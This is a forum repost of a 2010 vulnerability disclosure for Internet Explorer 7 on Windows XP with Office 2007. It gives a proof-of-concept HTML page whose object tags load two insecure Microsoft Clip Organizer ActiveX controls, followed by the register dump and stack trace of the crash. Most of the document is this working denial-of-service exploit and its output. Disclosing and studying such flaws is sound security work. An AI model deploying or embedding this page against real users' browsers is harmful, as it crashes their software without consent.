[转帖]IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[转帖]IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control

发表于: 2010-7-20 23:02 4333

[转帖]IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control

freebsdlin 活跃值

2010-7-20 23:02

4333

# IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control
#
# Date: 19th july 2010
#
# Author: Dinesh Arora & Beenu Arora
#
#
# Affected / Tested Version of IE : 7.0 / WinXP SP3 / MS Office 2007

POC:
 
        <!--
        COM Object - {0009608B-3E4E-4BF4-8C8C-D107F1F7B4CE} MC Euro Lexical Analyzer
        *******************************************************************************
        COM Object Filename : C:\PROGRA~1\MICROS~2\Office12\MCPS.DLL
        Major Version       : 12
        Minor Version       : 0
        Build Number        : 4518
        Revision Number     : 1014
        Product Version     : 12.0.4518.1014
        Product Name        : Microsoft Clip Organizer
        -->
        <object id=TestObj classid="CLSID:{0009608B-3E4E-4BF4-8C8C-D107F1F7B4CE}" style="width:100;height:350"></object>
 
 
 
        <!--
        COM Object - {0051FAAD-74C8-4057-8A85-1CFBF9ABB05C} MC Shared Search Scope
        *******************************************************************************
        COM Object Filename : C:\PROGRA~1\MICROS~2\Office12\MCPS.DLL
        Major Version       : 12
        Minor Version       : 0
        Build Number        : 4518
        Revision Number     : 1014
        Product Version     : 12.0.4518.1014
        Product Name        : Microsoft Clip Organizer
        *******************************************************************************
        -->
        <object id=TestObj classid="CLSID:{0051FAAD-74C8-4057-8A85-1CFBF9ABB05C}" style="width:100;height:350"></object>
 
 
Register:
 
EAX 02299BC4
ECX 00000000
EDX 00000000
EBX 00000000
ESP 02299BC0
EBP 02299C14
ESI 02299C8C
EDI 00000000
EIP 7C812AFB kernel32.7C812AFB
 
 
 
kernel32!RaiseException+53 in C:\WINDOWS\system32\kernel32.dll from Microsoft Corporation has caused an unknown exception (0xc06d007e) on thread 33
 
This exception originated from MCPS!DllGetClassObject+6db1. 
 
 
Function                Arg 1     Arg 2     Arg 3   Source 
kernel32!RaiseException+53     c06d007e     00000000     00000001    
MCPS!DllGetClassObject+6db1     00000000     06029c38     39f34f4c    
MCPS!DllGetClassObject+5c6d     39f2a3bc     39f221b4     39f34360    
MCPS!DllCanUnloadNow+2b6b     00205cf0     0602a688     06029d64    
ole32!CClassCache::CDllPathEntry::DllGetClassObject+2d     00205cf0     0602a688     06029d64    
ole32!CClassCache::CDllFnPtrMoniker::BindToObjectNoSwitch+1f     06029d18     0602a688     06029d64    
ole32!CClassCache::GetClassObject+38     06029d6c     0602a83c     0602a300    
ole32!CServerContextActivator::GetClassObject+f5     77607150     0602a300     0602a83c    
ole32!ActivationPropertiesIn::DelegateGetClassObject+f3     0602a300     0602a83c     0602a300    
ole32!CApartmentActivator::GetClassObject+4d     77607154     0602a300     0602a83c    
ole32!CProcessActivator::GCOCallback+2b     77607154     00000001     00000000    
ole32!CProcessActivator::AttemptActivation+2c     7760714c     0602a15c     00000000    
ole32!CProcessActivator::ActivateByContext+42     7760714c     0602a15c     00000000    
ole32!CProcessActivator::GetClassObject+48     7760714c     0602a300     0602a83c    
ole32!ActivationPropertiesIn::DelegateGetClassObject+f3     0602a300     0602a83c     003a0043    
ole32!CClientContextActivator::GetClassObject+88     77607114     00000001     0602a83c    
ole32!ActivationPropertiesIn::DelegateGetClassObject+f3     0602a300     0602a83c     774eca20    
ole32!ICoGetClassObject+334     0602a9dc     00000007     00000000    
ole32!CComActivator::DoGetClassObject+93     0602a9dc     00000007     00000000    
ole32!CoGetClassObject+1b     0602a9dc     00000007     00000000    
urlmon!CoGetClassObjectWrap+33     0602a9dc     00000007     00000000    
urlmon!CoGetClassObjectFromURL+2ae     056f8fd0     00000000     00000000    
mshtml!CCodeLoad::BindToObject+464     3cf5193c     0602bc00     00000000    
mshtml!CCodeLoad::Init+296     0576d538     0602bc00     3cf8d43c    
mshtml!COleSite::CreateObject+5a5     0602bc00     05720bf8     05976520    
mshtml!CObjectElement::CreateObject+6af     3cee8243     0573a860     00000000    
mshtml!CHtmObjectParseCtx::Execute+8     0573a860     00000000     00000000    
mshtml!CHtmParse::Execute+43     05720bf8     00000000     0573a860    
mshtml!CHtmPost::Broadcast+11     3cedb43d     0577ca50     0573a860    
mshtml!CHtmPost::Exec+40a     24a63821     0577ca50     0573a860    
mshtml!CHtmPost::Run+13     24a63821     0577ca50     0573a860    
mshtml!PostManExecute+dc     0577ca50     24a63821     0573a860    
mshtml!PostManResume+9e     0573a860     00000001     0602fdf4    
mshtml!CHtmPost::OnDwnChanCallback+10     05952930     0573a860     0602fe28    
mshtml!CDwnChan::OnMethodCall+19     05952930     00000000     00000000    
mshtml!GlobalWndOnMethodCall+101     0602feb0     3cf513d9     00000000    
mshtml!GlobalWndProc+181     005707a2     00000009     00000000    
user32!InternalCallWinProc+28     3cf513d9     005707a2     00008002    
user32!UserCallWinProcCheckWow+150     00000000     3cf513d9     005707a2    
user32!DispatchMessageWorker+306     0602ff64     00000000     0602ffb4    
user32!DispatchMessageW+f     0602ff64     053400b8     000001c1    
ieframe!CTabWindow::_TabWindowThreadProc+189     056adac8     053400b8     000001c1    
kernel32!BaseThreadStart+37     3e25e4fc     056a5cf8     00000000    
 
 
The assembly instruction at kernel32!RaiseException+53 in C:\WINDOWS\system32\kernel32.dll from Microsoft Corporation has caused an unknown exception (0xc06d007e) on thread 33
This exception originated from MCPS!DllGetClassObject+6db1.